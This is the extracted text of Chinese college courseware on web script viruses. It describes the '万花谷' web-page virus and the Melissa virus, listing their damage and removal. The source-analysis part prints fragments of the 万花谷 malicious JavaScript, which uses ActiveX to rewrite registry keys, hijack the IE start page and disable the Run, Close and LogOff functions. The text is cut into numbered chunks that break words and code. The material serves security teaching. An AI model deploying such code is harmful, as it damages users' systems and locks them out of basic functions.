典型网页病毒剖析课件

《典型网页病毒剖析课件》由会员上传分享，免费在线阅读，更多相关内容在教育资源-天天文库。

1、计算机病毒与防治重庆电子工程职业学院计算机病毒与防治课程小组教学单元3-4网页脚本病毒防治万花谷病毒的手工清除万花谷病毒特点及代码分析梅丽莎病毒特点及代码分析第二讲典型网页病毒剖析计算机病毒与防治课程小组梅丽莎病毒的手工清除万花谷病毒特点计算机病毒与防治课程小组病毒类型网页脚本病毒危险级别★★★★★影响系统Win9X/ME/NT/2000/XP/2003万花谷病毒特点病毒名称:万花谷万花谷病毒特点计算机病毒与防治课程小组曾经在互连网上散发过一个美丽诱人的网址“万花谷”，这实际是一个恶意“陷阱”，有

2、人经不住诱惑，只用鼠标轻轻点一下，计算机就立即瘫痪了，这是有人利用Java最新技术进行破坏的一个恶意网址。本病毒是在页面中嵌入了恶意的JavaScript代码，它最初出现在http://on888.home.chinaren.com个人网站上，随后其他一些个人主页也模仿或被感染了该病毒代码。万花谷病毒特点万花谷病毒特点计算机病毒与防治课程小组其破坏特性如下：(1)用户不能正常使用WINDOWS的DOS功能程序；(2)用户不能正常退出WINDOWS；(3)开始菜单上的"关闭系统"、"运行"等栏目被屏

3、蔽，防止用户重新以DOS方式启动，关闭DOS命令、关闭REGEDIT命令等。(4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。具体的表现形式是：(1)网络地址是：www.on888.xxx.xxx.com；(2)在IE的“收藏夹”中自动加上“万花谷”的快捷方式,网络地址是：http://96xx.xxx.com；万花谷病毒特点万花谷病毒源码分析计算机病毒与防治课程小组document.write("

4、veX.ActiveXComponent>");function AddFavLnk(loc, DispName, SiteURL) {var Shor = Shl.CreateShortcut(loc + "\" + DispName +".URL");Shor.TargetPath = SiteURL;Shor.Save(); }function f(){Try { //ActiveX initializationa1=document.applets[0];a1.setC

5、LSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl = a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance(); FSO = a1.GetObject();a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInst

6、ance(); Net = a1.GetObject();万花谷病毒源码分析计算机病毒与防治课程小组try {if (documents .cookies.indexOf("Chg") == -1){ //以下内容是对注册表进行修改Shl.RegWrite ("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://com.6to23.com/");var expdate = new Date((new Dat

7、e()).getTime() + (1));documents.cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" //设置IE主页Shl.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", 01, "REG_BINARY"); //消除RUN按纽Shl.RegWrite ("HKC

8、U\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", 01, "REG_BINARY"); //消除关闭按纽Shl.RegWrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", 01, "REG_BINARY"); //消除注销按纽Shl.RegWrite